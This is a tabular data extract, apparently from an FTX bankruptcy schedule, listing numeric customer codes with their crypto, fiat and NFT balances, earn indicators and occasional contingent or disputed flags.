| 07358971 | | USD[10.00] | | |
| 07358972 | | BRZ[1], CUSDT[2], DOGE[2], USD[0.01] | | |
| 07358973 | | USD[10.00] | | |
| 07358974 | | CUSDT[1], USD[0.00] | | |
| 07358975 | | USD[10.00] | | |
| 07358976 | | BRZ[1], BTC[0], CUSDT[3], DOGE[4.05213569], GRT[1.00498957], SOL[0], TRX[1], USD[0.00], USDT[0.00000037] | Yes | |
| 07358977 | | BAT[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07358978 | | USD[10.00] | | |
| 07358979 | | TRX[216.8696856], USD[0.00] | | |
| 07358980 | | CUSDT[1], DOGE[252.47826588], USD[0.00] | | |
| 07358981 | | BTC[.0002966], DOGE[501.01840466], LTC[.37892556], TRX[606.63528729], USD[10.00] | | |
| 07358982 | | USD[10.00] | | |
| 07358983 | | USD[10.00] | | |
| 07358984 | | CUSDT[2], DOGE[2122.00209278], SUSHI[2.56477093], TRX[2], USD[0.00] | | |
| 07358985 | | USD[10.00] | | |
| 07358988 | | CUSDT[1], MATIC[0], USD[0.00] | Yes | |
| 07358989 | | USD[10.00] | | |
| 07358991 | | USD[10.00] | | |
| 07358993 | | DOGE[1271.42295302], USD[0.42] | | |
| 07358994 | | BTC[.00000009], ETH[0], ETHW[0], USD[0.00] | | |
| 07358995 | | DOGE[1], USD[0.00] | | |
| 07358996 | | USD[10.00] | | |
| 07358997 | | BF_POINT[300], BTC[.02704692], ETH[.33538268], ETHW[.3352358], NFT [503269770884228116/Coachella x FTX Weekend 1 #55][1], SHIB[2], SOL[1.88647829], SUSHI[34.00543741], USD[10.28] | Yes | |
| 07358998 | | BAT[1.0165555], BRZ[1], CUSDT[6], KSHIB[221.16028054], SOL[6.05880861], USD[0.00] | Yes | |
| 07358999 | | DOGE[19.2220977], USD[0.05] | | |
| 07359000 | | USD[10.00] | | |
| 07359001 | | BTC[.00033348], CUSDT[2], DOGE[60.37274055], TRX[2], USD[394.76], USDT[1] | | |
| 07359003 | | CUSDT[1], DOGE[.34784354], TRX[2], USD[0.12] | | |
| 07359005 | | USD[10.00] | | |
| 07359006 | | USD[10.00] | | |
| 07359007 | | DOGE[134.13055168], TRX[1], USD[0.00] | | |
| 07359008 | | DOGE[2806.35976288], SUSHI[1.12655586], USD[0.00] | Yes | |
| 07359010 | | USD[10.00] | | |
| 07359011 | | ETH[.00007131], ETHW[.0007131], USD[0.00] | Yes | |
| 07359012 | | CUSDT[4], DOGE[.00329512], TRX[219.21532283], USD[0.00], USDT[0.00731081] | Yes | |
| 07359014 | | ALGO[152.27439388], AVAX[4.76017446], BF_POINT[100], BTC[.00044415], CUSDT[131.74408627], DOGE[3783.33621317], ETH[.03448631], ETHW[.03406223], GRT[1], MATIC[71.85238772], SHIB[1], SOL[5.31543806], SUSHI[1.08603253], TRX[9], UNI[1.09063036], USD[289.64], USDT[190.34559988] | Yes | |
| 07359015 | | BTC[.00010706], ETH[.00283805], ETHW[.00283805], USD[0.00] | | |
| 07359016 | | BAT[2.11284465], BRZ[4], BTC[0], CUSDT[9], DOGE[6.03938728], SHIB[1], SOL[0], TRX[8], USD[0.01], USDT[1.10220993] | Yes | |
| 07359017 | | USD[10.00] | | |
| 07359018 | | DOGE[52.6854257], USD[0.00] | Yes | |
| 07359019 | | TRX[0], USDT[.04166445] | | |
| 07359021 | | USD[10.00] | | |
| 07359022 | | ETH[.00000697], ETHW[.0000697], USD[0.00] | Yes | |
| 07359023 | | CUSDT[1], DOGE[1019.32879124], TRX[1897.66961712], USD[106.83] | Yes | |
| 07359024 | | BTC[.00021531], CUSDT[1], DOGE[208.11037588], USD[0.00] | Yes | |
| 07359025 | | BRZ[1], BTC[.00272211], CUSDT[6], DOGE[2382.8590623], ETH[.01252573], ETHW[.01252573], TRX[1], USD[500.00] | | |
| 07359026 | | USD[20.14] | | |
| 07359030 | | BRZ[0], BTC[0], ETH[0], USD[0.00] | | |
| 07359031 | | USD[10.00] | | |
| 07359032 | | USD[10.00] | | |
| 07359033 | | DOGE[172.00022153], USD[0.00] | | |
| 07359034 | | CUSDT[1], TRX[3], USD[0.28], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359035 | | USD[10.00] | | |
| 07359036 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07359037 | | BTC[.00184896], CUSDT[36], DOGE[3], SHIB[1], SOL[0.00001175], SUSHI[.00037008], USD[0.00] | Yes | |
| 07359038 | | ETH[.02828273], ETHW[.02792705], SHIB[0], TRX[0], USD[0.00] | Yes | |
| 07359039 | | USD[0.00] | | |
| 07359040 | | BAT[1], TRX[1], USD[1.86] | | |
| 07359041 | | BTC[0], CUSDT[4], DOGE[2643.81959578], ETH[0], ETHW[0], LTC[2.37756447], TRX[2], USD[0.00] | Yes | |
| 07359042 | | CUSDT[1], DOGE[13779.15655368], SHIB[19035935.4348674], USD[0.00] | Yes | |
| 07359043 | | USD[0.01] | Yes | |
| 07359044 | | CUSDT[3], DOGE[2311.76727849], TRX[1], USD[0.00] | Yes | |
| 07359046 | | DOGE[135.05007183], USD[0.00] | | |
| 07359047 | | BRZ[169.21580881], DOGE[1], USD[0.00] | | |
| 07359048 | | BRZ[0], DOGE[0], TRX[0], USD[0.05] | | |
| 07359049 | | USD[10.00] | | |
| 07359050 | | USD[10.00] | | |
| 07359051 | | USD[10.00] | | |
| 07359052 | | USD[10.00] | | |
| 07359053 | | BRZ[1], CUSDT[2], DOGE[625.80612212], USD[0.00] | | |
| 07359054 | | DOGE[135.59215398], USD[0.00] | | |
| 07359055 | | USD[10.00] | | |
| 07359056 | | DOGE[1], USD[0.00] | Yes | |
| 07359057 | | USD[10.00] | | |
| 07359058 | | USD[10.00] | | |
| 07359059 | | USD[0.00] | | |
| 07359060 | | USD[10.00] | | |
| 07359061 | | CUSDT[5], DOGE[.91136719], SOL[1.10044694], TRX[2], USD[0.01] | Yes | |
| 07359062 | | CUSDT[4], DOGE[41.60688332], TRX[1], USD[0.00] | Yes | |
| 07359064 | | CUSDT[2], DOGE[.0037835], GRT[4.79882036], USD[0.01] | | |
| 07359066 | | USD[10.00] | | |
| 07359067 | | USD[10.00] | | |
| 07359068 | | DOGE[271.27949094], USD[0.00] | | |
| 07359070 | | USD[0.00] | | |
| 07359071 | | DOGE[0], ETH[0], ETHW[0], USD[0.33] | | |
| 07359072 | | USD[0.00] | | |
| 07359073 | | USD[10.00] | | |
| 07359074 | | USD[10.00] | | |
| 07359075 | | USD[10.00] | | |
| 07359077 | | BRZ[1], BTC[0], CUSDT[525.71960278], DOGE[1], ETH[0], TRX[224.4289838], USD[0.00] | | |
| 07359078 | | CUSDT[2], DOGE[95.02610798], TRX[203.26160068], USD[150.57] | | |
| 07359079 | | TRX[1], USD[0.00] | | |
| 07359080 | | USD[10.00] | | |
| 07359081 | | USD[10.00] | | |
| 07359082 | | USD[10.00] | | |
| 07359083 | | USD[10.00] | | |
| 07359085 | | USD[10.00] | | |
| 07359087 | | SHIB[1], USD[0.01] | | |
| 07359088 | | TRX[207.42657669], USD[0.00] | | |
| 07359089 | | BAT[1.01655549], CUSDT[1], DOGE[1], TRX[2], USD[0.01], USDT[1.10731215] | Yes | |
| 07359090 | | BRZ[4], CUSDT[9], DOGE[502.59611635], TRX[3], USD[0.00] | Yes | |
| 07359091 | | BTC[.0003], ETH[.000006], ETHW[.000006], LTC[.00983181], SOL[.0059], USD[95354.78], USDT[1.30863975] | | |
| 07359094 | | CUSDT[2], DOGE[.51868554], USD[0.26] | | |
| 07359095 | | BRZ[1], CUSDT[9], TRX[3], USD[0.00] | | |
| 07359096 | | BRZ[1], CUSDT[2], DOGE[2024.5666849], TRX[1], USD[0.00] | | |
| 07359097 | | CUSDT[2], DOGE[.00007361], TRX[3], USD[0.01] | | |
| 07359098 | | USD[10.00] | | |
| 07359099 | | DOGE[3.36864336], GRT[.00085947], TRX[1], USD[0.00], USDT[1] | | |
| 07359100 | | USD[10.00] | | |
| 07359102 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359103 | | BTC[0.00028480], CUSDT[1], USD[0.00] | | |
| 07359104 | | BRZ[1], CUSDT[3], DOGE[1], SHIB[15092494.28912605], TRX[5], USD[0.00], USDT[1.08543555] | Yes | |
| 07359105 | | BRZ[54.82192135], BTC[.01703158], CUSDT[3], DOGE[.60685757], ETH[.20880607], ETHW[.20880607], KSHIB[1907.81222396], SHIB[3292782.24729248], TRX[3], USD[0.67] | | |
| 07359107 | | USD[10.00] | | |
| 07359108 | | BRZ[3], CUSDT[4], DOGE[902.07262114], SOL[41.45625757], TRX[944.53371377], USD[2.88] | Yes | |
| 07359109 | | USD[10.00] | | |
| 07359110 | | DOGE[15.936], USD[0.40] | | |
| 07359111 | | USD[10.00] | | |
| 07359112 | | CUSDT[1], DOGE[3148.40504009], USD[59.25] | | |
| 07359113 | | DOGE[.00001126], USD[0.00] | | |
| 07359114 | | BAT[0], BRZ[2], CUSDT[9.00076530], DOGE[4506.92166612], GRT[.001064], SHIB[2567596.28488812], TRX[2.03798948], USD[0.00] | | |
| 07359115 | | CUSDT[1], USD[15.05] | | |
| 07359116 | | USD[10.00] | | |
| 07359118 | | DOGE[.06412089], USD[0.00] | Yes | |
| 07359120 | | USD[10.00] | | |
| 07359121 | | USD[10.00] | | |
| 07359122 | | BAT[1], BCH[.37249442], BRZ[3], CUSDT[9], DOGE[16950.92462543], ETH[1.09593681], ETHW[1.09593681], TRX[3], UNI[1], USD[0.00] | | |
| 07359124 | | BTC[0], SOL[0], UNI[0], USD[4640.06] | | |
| 07359125 | | DOGE[.00045573], USD[0.00] | | |
| 07359126 | | USD[10.00] | | |
| 07359127 | | USD[10.00] | | |
| 07359128 | | CUSDT[3969.94780723], DOGE[384.05414818], USD[0.00] | | |
| 07359130 | | SOL[.00000394], USD[0.00] | Yes | |
| 07359131 | | BAT[22.96259292], BRZ[1], DOGE[1], USD[0.00] | | |
| 07359133 | | DOGE[265.82729041], USD[10.00] | | |
| 07359134 | | USD[10.00] | | |
| 07359135 | | USD[8.71] | | |
| 07359136 | | USD[10.00] | | |
| 07359137 | | CUSDT[2], DOGE[3179.94773773], ETH[.05796355], ETHW[.05796355], GRT[1], SHIB[3573997.35023223], TRX[1], USD[0.74] | | |
| 07359138 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07359139 | | CUSDT[52.65362053], DOGE[2088.98523282], TRX[253.92808001], USD[0.08] | | |
| 07359141 | | BCH[0], BRZ[2], CUSDT[3], DOGE[1], ETH[0], GRT[1], LTC[0], SOL[0], TRX[2], USD[0.01] | | |
| 07359142 | | BRZ[1], BTC[.00022498], CUSDT[1], SHIB[1], TRX[3], USD[0.01] | | |
| 07359143 | | DOGE[0], TRX[2], USD[0.00], USDT[0.00002439] | | |
| 07359144 | | BAT[7.83092482], CUSDT[4], SUSHI[.29937869], TRX[1], USD[0.19] | | |
| 07359145 | | USD[0.00] | | |
| 07359146 | | USD[10.00] | | |
| 07359147 | | CUSDT[3], DOGE[1], TRX[1], USD[0.01] | | |
| 07359148 | | USD[10.00] | | |
| 07359149 | | BAT[1], BRZ[2], CUSDT[1], TRX[3], USD[0.00] | | |
| 07359151 | | USD[0.46] | | |
| 07359152 | | USD[10.00] | | |
| 07359153 | | USD[10.00] | | |
| 07359154 | | CUSDT[1], DOGE[391.27607868], TRX[1], USD[0.00] | | |
| 07359155 | | SUSHI[.5958501], USD[0.00] | | |
| 07359156 | | BTC[.00156264], CUSDT[2], DOGE[870.70348902], ETH[0.01513792], ETHW[0.01494640], SHIB[5838501.27442165], USD[0.00] | Yes | |
| 07359157 | | DOGE[1051.37360416], TRX[1], USD[0.00] | Yes | |
| 07359158 | | BRZ[1], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07359159 | | USD[10.00] | | |
| 07359160 | | USD[10.00] | | |
| 07359161 | | USD[10.00] | | |
| 07359163 | | USD[10.00] | | |
| 07359164 | | USD[10.00] | | |
| 07359165 | | DOGE[2078.3759889], TRX[1861.29541797], USD[0.00] | Yes | |
| 07359166 | | USD[10.63] | Yes | |
| 07359167 | | USD[10.00] | | |
| 07359168 | | USD[10.00] | | |
| 07359169 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359170 | | USD[0.00] | | |
| 07359171 | | BRZ[1], BTC[.00149597], CUSDT[1], DOGE[1], LINK[1.01310521], SOL[1.06041483], USD[0.94] | | |
| 07359172 | | USD[0.00] | | |
| 07359173 | | USD[10.00] | | |
| 07359174 | | BTC[0], DAI[0], DOGE[0.05186701], USD[0.00] | | |
| 07359175 | | USD[10.00] | | |
| 07359176 | | SHIB[1], SOL[3.88500605], USD[0.00] | Yes | |
| 07359177 | | USD[10.00] | | |
| 07359178 | | DOGE[9.27005893], USD[0.00] | | |
| 07359180 | | CUSDT[1], DOGE[42.71480249], USD[0.00] | | |
| 07359182 | | BAT[1], BRZ[1], CUSDT[5], DOGE[1], GRT[2], TRX[.000004], USD[0.00], USDT[.7561417] | | |
| 07359183 | | ETH[.00000116], USD[551.37] | Yes | |
| 07359184 | | DOGE[.42137841], ETH[.00000001], USD[0.00] | | |
| 07359185 | | CUSDT[1], DOGE[17.11868878], USD[0.00] | | |
| 07359186 | | USD[10.00] | | |
| 07359187 | | CUSDT[1], TRX[395.98425036], USD[0.00] | | |
| 07359188 | | USD[10.00] | | |
| 07359189 | | USD[0.00] | | |
| 07359190 | | USD[10.00] | | |
| 07359191 | | BRZ[0], LINK[.25060892], USD[0.00] | | |
| 07359192 | | USD[10.00] | | |
| 07359193 | | BAT[1.01320043], BRZ[2], CUSDT[2], DOGE[1078.86277897], GRT[1.00404471], SHIB[7155366.0146775], USD[1.86] | Yes | |
| 07359194 | | USD[10.00] | | |
| 07359195 | | CUSDT[1], DOGE[190.13521939], USD[0.00] | | |
| 07359197 | | TRX[1], USD[0.00] | | |
| 07359198 | | SHIB[409069.25908754], USD[0.00] | Yes | |
| 07359199 | | BTC[.00221757], DOGE[678.05008617], SUSHI[.69392515], USD[0.00] | | |
| 07359200 | | USD[10.00] | | |
| 07359201 | | USD[110.00] | | |
| 07359202 | | USD[10.00] | | |
| 07359203 | | USD[10.00] | | |
| 07359204 | | USD[22.12] | | |
| 07359205 | | DOGE[1670.96781452], LINK[2.1737626], SHIB[374384.19473131], TRX[205.78072301], USD[0.06] | Yes | |
| 07359206 | | USD[10.00] | | |
| 07359207 | | BAT[6.46882998], CAD[0.00], ETH[0], GRT[5.7726368], USD[0.00], USDT[0] | Yes | |
| 07359208 | | DOGE[1], USD[0.00] | | |
| 07359209 | | USD[10.00] | | |
| 07359210 | | BRZ[1], CUSDT[3], DOGE[10009.40243281], SHIB[1], USD[0.00] | | |
| 07359211 | | USD[0.00] | Yes | |
| 07359212 | | CUSDT[3], GRT[8.82303243], TRX[109.07858313], USD[0.00] | | |
| 07359213 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07359214 | | CAD[11.90], USD[0.00] | | |
| 07359215 | | DOGE[1], LINK[.36903348], USD[0.00] | | |
| 07359216 | | USD[10.00] | | |
| 07359217 | | NFT (465476422922604955/Coachella x FTX Weekend 2 #12985)[1], TRX[84.22661271], USD[0.00] | | |
| 07359219 | | BRZ[3], CUSDT[7], DOGE[1321.2176335], LINK[1.30180841], LTC[.18368706], SHIB[1], TRX[385.55872682], USD[0.01] | | |
| 07359220 | | USD[10.00] | | |
| 07359222 | | CUSDT[4], DOGE[327.2595603], USD[0.00] | | |
| 07359223 | | USD[10.00] | | |
| 07359225 | | USD[10.00] | | |
| 07359226 | | DOGE[123.2065743], USD[0.00] | | |
| 07359227 | | BAT[1.01655549], BRZ[2], CUSDT[10], DOGE[7557.29684539], SHIB[34889.75025426], TRX[829.54898358], USD[0.00] | Yes | |
| 07359228 | | BAT[9.99], GRT[4.96], USD[1.51] | | |
| 07359229 | | USD[10.00] | | |
| 07359231 | | USD[10.00] | | |
| 07359232 | | USD[10.00] | | |
| 07359233 | | USD[10.00] | | |
| 07359234 | | ETH[0], ETHW[0], LTC[0], SOL[0], SUSHI[0], USD[5.33], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359235 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07359236 | | USD[0.01] | | |
| 07359237 | | USD[0.00] | | |
| 07359238 | | USD[10.00] | | |
| 07359239 | | DOGE[1], USD[0.00] | | |
| 07359240 | | USD[10.00] | | |
| 07359241 | | USD[0.30] | | |
| 07359243 | | USD[10.00] | | |
| 07359244 | | USD[10.00] | | |
| 07359246 | | CUSDT[2], USD[0.18] | | |
| 07359247 | | CUSDT[1], USD[0.00] | | |
| 07359248 | | BTC[.00000011], DOGE[.00452603], USD[0.00] | | |
| 07359249 | | BAT[1], BRZ[1], BTC[.10545723], CUSDT[6], DOGE[5], ETH[.46164902], ETHW[.46164902], SOL[28.4156621], TRX[3], USD[0.66], USDT[2] | | |
| 07359250 | | USD[10.00] | | |
| 07359251 | | USD[10.00] | | |
| 07359252 | | BTC[.00033663], CUSDT[3], DOGE[.40455494], TRX[1], USD[0.01] | | |
| 07359253 | | DOGE[137.46842006], USD[0.00] | | |
| 07359254 | | USD[10.00] | | |
| 07359256 | Contingent, Disputed | BTC[0], CUSDT[4], DOGE[1], TRX[1], USD[0.00], USDT[0.00001563] | Yes | |
| 07359257 | | CUSDT[2], DOGE[4590.95077591], GRT[1], SOL[12.20438679], TRX[2], USD[0.00] | | |
| 07359258 | | DOGE[1.00000259], TRX[6209.72104717], USD[0.00] | Yes | |
| 07359259 | | CUSDT[3], DOGE[106.72749673], TRX[1], USD[0.01] | Yes | |
| 07359260 | | DOGE[123.47121034], USD[0.00] | | |
| 07359261 | | BAT[7.97508309], DOGE[625.91198459], SHIB[114179.32919954], TRX[128.63113281], UNI[.22389025], USD[0.00] | | |
| 07359262 | | NFT (425181585655054307/Entrance Voucher #1463)[1], NFT (438120981713378219/Imola Ticket Stub #1391)[1], NFT (449808736594746105/The Hill by FTX #4758)[1], NFT (472608782556049321/Microphone #1485)[1], NFT (473887549918302194/Humpty Dumpty #1011)[1], NFT (495801755899834589/Montreal Ticket Stub #21)[1], USD[0.00] | | |
| 07359263 | | CUSDT[13], TRX[8.57352109], USD[0.72] | | |
| 07359264 | | USD[10.00] | | |
| 07359265 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07359267 | | USD[10.00] | | |
| 07359268 | | BAT[1.0165555], BRZ[9.93854323], CUSDT[44], GRT[1.00498957], TRX[19.83825466], USD[0.00], USDT[1.10428249] | Yes | |
| 07359272 | | CUSDT[1], DOGE[1016.12663122], USD[0.00] | | |
| 07359273 | | USD[10.00] | | |
| 07359275 | | USD[10.00] | | |
| 07359277 | | USD[10.00] | | |
| 07359279 | | USD[0.00] | | |
| 07359280 | | BTC[0.00000772], SOL[0], USD[0.00] | | |
| 07359281 | | USD[10.00] | | |
| 07359282 | | DOGE[144.60372866], USD[0.00] | | |
| 07359283 | | USD[10.00] | | |
| 07359284 | | BTC[.00002349], USD[0.00] | Yes | |
| 07359285 | | DOGE[1], USD[0.00] | | |
| 07359286 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], SHIB[248.64891020], SOL[0.00004830], SUSHI[0], USD[0.00], USDT[0] | | |
| 07359287 | | USD[10.00] | | |
| 07359288 | | USD[10.00] | | |
| 07359289 | | USD[10.00] | | |
| 07359290 | | BTC[0.00486250], SOL[11.52249661], SUSHI[0.14813899], USD[22.07], USDT[2.33849299] | | |
| 07359291 | | USD[10.00] | | |
| 07359292 | | USD[10.00] | | |
| 07359294 | | USD[1000.00] | | |
| 07359296 | | USD[10.00] | | |
| 07359298 | | DOGE[100.53474441], USD[0.00] | | |
| 07359299 | | USD[10.00] | | |
| 07359300 | | USD[10.00] | | |
| 07359302 | | CUSDT[2], USD[0.00] | | |
| 07359303 | | USD[10.00] | | |
| 07359304 | | BRZ[5], BTC[0], DOGE[0.02076169], HKD[1.83], SHIB[14], SOL[0], TRX[0.00001300], USD[0.00], USDT[0.00000916], YFI[0] | Yes | |
| 07359305 | | USD[10.00] | | |
| 07359306 | | USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359307 | | AAVE[.00012502], BCH[0], BTC[0], CUSDT[1], DOGE[4.03783675], ETH[0], LINK[0], LTC[0], SUSHI[0], TRX[4], UNI[0.00597153], USD[0.00] | Yes | |
| 07359308 | | CUSDT[0], DOGE[0], LTC[0], USD[0.01], USDT[1] | | |
| 07359309 | | CUSDT[1], DOGE[16.86004737], USD[0.00], USDT[0.00001687] | Yes | |
| 07359310 | | USD[10.00] | | |
| 07359311 | | USD[10.00] | | |
| 07359312 | | USD[0.00] | | |
| 07359313 | | CUSDT[1], USD[0.00] | | |
| 07359314 | | ETH[.00618508], ETHW[.006103], USD[0.00] | Yes | |
| 07359315 | | CUSDT[3], DOGE[8436.60363883], ETH[.11540402], ETHW[.11428192], TRX[1], USD[0.00] | Yes | |
| 07359316 | | BRZ[2], CUSDT[2346.68236764], DOGE[2411.31541786], TRX[1], USD[0.90] | | |
| 07359317 | | USD[10.00] | | |
| 07359318 | | BRZ[1], CUSDT[1], DOGE[7.34028569], USD[0.90] | | |
| 07359319 | | ETH[.00000006], ETHW[.00000006], USD[0.00] | Yes | |
| 07359320 | | USD[10.00] | | |
| 07359321 | | CUSDT[1], DOGE[739.07434942], TRX[91.9141642], USD[0.00] | | |
| 07359322 | | USD[10.00] | | |
| 07359323 | | USD[0.50] | | |
| 07359324 | | USD[0.00] | | |
| 07359325 | | DOGE[0], NFT (325975536224878141/SolSoul-05779)[1], NFT (327577478070433990/Spider Web #238)[1], USD[1.99] | | |
| 07359326 | | ETH[0], ETHW[1.35815312], MATIC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000050] | | |
| 07359327 | | USD[10.00] | | |
| 07359328 | | USD[10.00] | | |
| 07359329 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.45] | | |
| 07359331 | | BRZ[2], CUSDT[2], DOGE[2], NFT (307489771062328211/Sigma Shark #976)[1], NFT (334862311478378711/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #67)[1], NFT (335716588435645298/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #63)[1], SOL[0], USD[0.00] | Yes | |
| 07359332 | | USD[10.00] | | |
| 07359333 | | CUSDT[2], TRX[3], USD[0.47] | | |
| 07359335 | | CUSDT[1], DOGE[.0000171], USD[0.01], USDT[1] | | |
| 07359336 | | USD[10.00] | | |
| 07359338 | | USD[10.00] | | |
| 07359339 | | USD[0.16], USDT[0] | | |
| 07359340 | | BTC[.00331667], CUSDT[3], DOGE[1355.67734022], SHIB[1376651.98237885], SOL[.00006826], TRX[2], USD[0.01] | | |
| 07359341 | | BTC[.00000004], CUSDT[22], DOGE[2], LTC[0], SHIB[3], SUSHI[57.25574759], TRX[4], USD[0.00] | Yes | |
| 07359343 | | USD[10.00] | | |
| 07359344 | | USD[0.01] | | |
| 07359345 | | ETH[.0000027], USD[0.00] | Yes | |
| 07359346 | | DOGE[2755.70320947], SHIB[28278191.9427062], TRX[4], USD[5.01] | | |
| 07359347 | | USD[0.00] | | |
| 07359348 | | USD[0.00] | | |
| 07359349 | | ETH[.00026417], ETHW[.00026417], USD[1.09] | | |
| 07359351 | | USD[1016.52] | | |
| 07359353 | | USD[10.00] | | |
| 07359354 | | USD[10.00] | | |
| 07359355 | | USD[10.00] | | |
| 07359356 | | DOGE[3490.98185524], SUSHI[0], USD[0.00] | Yes | |
| 07359357 | | USD[10.00] | | |
| 07359358 | | USD[10.00] | | |
| 07359360 | | USD[10.00] | | |
| 07359361 | | CUSDT[3], USD[0.01], USDT[1] | | |
| 07359363 | | USD[0.00] | Yes | |
| 07359364 | | USD[10.00] | | |
| 07359365 | | USD[10.00] | | |
| 07359366 | | USD[10.00] | | |
| 07359367 | | USD[10.00] | | |
| 07359368 | | USD[10.00] | | |
| 07359369 | | BRZ[1], CUSDT[3], DOGE[1], ETH[0], USD[0.00] | | |
| 07359370 | | BTC[0], CUSDT[3], DOGE[0], ETH[0.01951825], ETHW[0.01927201], GRT[0], SOL[0], TRX[0], USD[52.77] | Yes | |
| 07359371 | | USD[0.03] | Yes | |
| 07359372 | | GRT[.74155456], SOL[.38958059], USD[74.96] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07359373 | | USD[10.00] | | |
| 07359374 | | CUSDT[4], DOGE[225.99360363], SHIB[1345525.78788784], TRX[1], USD[0.00] | | |
| 07359376 | | CUSDT[1], DOGE[2], USD[0.00], USDT[0] | | |
| 07359377 | | BTC[0], ETH[0], LINK[0], SOL[.02135953], TRX[0], USD[0.00], USDT[0] | | |
| 07359378 | | USD[10.00] | | |
| 07359379 | | USD[10.00] | | |
| 07359380 | | USD[10.00] | | |
| 07359381 | | DOGE[30.82473235], USD[0.00] | | |
| 07359382 | | CUSDT[1.13728996], USD[0.00] | | |
| 07359383 | | DOGE[1001.2967547], SUSHI[7.66866819], USD[10.71] | | |
| 07359384 | | BAT[.08505124], BRZ[2], CUSDT[4.15562556], DOGE[0.00597875], SOL[.00005715], TRX[.24943155], USD[0.00] | Yes | |
| 07359385 | | CUSDT[6], TRX[1], USD[3.94] | | |
| 07359386 | | USD[10.00] | | |
| 07359387 | | BRZ[3], BTC[.00459329], CUSDT[14], DOGE[1], ETH[0.00947650], ETHW[0.00935329], GRT[1.00367791], MATIC[47.53700131], SOL[.7231548], TRX[2], USD[0.00] | Yes | |
| 07359388 | | BTC[.00842712], CUSDT[3], DOGE[1064.87444136], ETH[.01229924], ETHW[.01229924], TRX[211.4361894], USD[0.00] | | |
| 07359389 | | USD[10.00] | | |
| 07359390 | | BRZ[1], CUSDT[3], DOGE[.00003138], SUSHI[1], TRX[1], USD[0.00] | | |
| 07359391 | | DOGE[174.90054717], USD[0.00] | | |
| 07359392 | | DOGE[0] | | |
| 07359394 | | TRX[1], USD[10.00] | | |
| 07359395 | | USD[10.00] | | |
| 07359397 | | USD[0.00] | | |
| 07359398 | | BRZ[1], CUSDT[2], DOGE[758.08178796], TRX[1], USD[0.69] | Yes | |
| 07359399 | | CUSDT[2], DOGE[15056.96817771], LINK[11.42525499], TRX[909.17871773], USD[2220.50] | Yes | |
| 07359400 | | USD[10.00] | | |
| 07359401 | | USD[10.00] | | |
| 07359402 | | LTC[.05347732], USD[0.00] | | |
| 07359403 | | USD[0.00] | | |
| 07359404 | | USD[20.00] | | |
| 07359405 | | CUSDT[1], DOGE[1470.02477427], USD[0.00] | Yes | |
| 07359407 | | BTC[.00145735], CUSDT[5], DOGE[73.71457597], ETH[.01183526], ETHW[.01168478], SHIB[153973.40004035], TRX[3], USD[0.00] | Yes | |
| 07359408 | | BTC[.00020886], USD[0.00] | | |
| 07359409 | | USD[10.00] | | |
| 07359410 | | USD[10.00] | | |
| 07359411 | | CUSDT[1], ETH[0], ETHW[0], NFT [4694068855298913800/Warriors 75th Anniversary Icon Edition Diamond #1795][1], TRX[2], USD[0.01] | Yes | |
| 07359412 | | BAT[0], BCH[0], BRZ[6.33105567], BTC[0], DOGE[4.01568240], ETH[0], GRT[1144.24049441], LINK[0], LTC[0], MATIC[29.70045087], NFT [305441698507570493/II. Elizabeth][1], NFT [562988269130511019/Piece #2][1], NFT [567121117637529923/Viki Fat #2][1], SHIB[5], SOL[5.36637110], TRX[1.00358506], USD[0.00] | Yes | |
| 07359413 | | BRZ[9.59245271], BTC[0.00001855], CUSDT[3], DOGE[19.19098275], ETH[0], GRT[9.42640613], MATIC[2.07422073], NFT [345500187096666570/Bahrain Ticket Stub #1799][1], PAXG[0], SHIB[4], SOL[0], SUSHI[3.19556623], TRX[11.01100826], USD[0.00], USDT[0.00013770] | Yes | |
| 07359414 | | USD[10.00] | | |
| 07359415 | | CUSDT[1], DOGE[.00003185], USD[0.01] | | |
| 07359416 | | BAT[1.00002776], BRZ[1], CUSDT[.00003775], DOGE[.00001838], SHIB[1], TRX[1.00005917], USD[0.01], USDT[0] | | |
| 07359417 | | DOGE[683.93203499], USD[0.00] | | |
| 07359418 | | USD[10.00] | | |
| 07359419 | | USD[10.00] | | |
| 07359420 | | DOGE[1], USD[538.82] | | |
| 07359421 | | USD[5.59] | Yes | |
| 07359422 | | SHIB[26131.26970517], USD[0.00], USDT[0] | | |
| 07359423 | | USD[10.00] | | |
| 07359424 | | USD[10.00] | | |
| 07359425 | | BRZ[1], CUSDT[12], USD[0.00] | Yes | |
| 07359426 | | USD[10.00] | | |
| 07359427 | | USD[10.00] | | |
| 07359428 | | DOGE[1], USD[0.00] | | |
| 07359429 | | USD[9.22] | | |
| 07359430 | | BAT[0], BRZ[0], DOGE[0], LTC[0], SOL[0], USD[0.00] | Yes | |
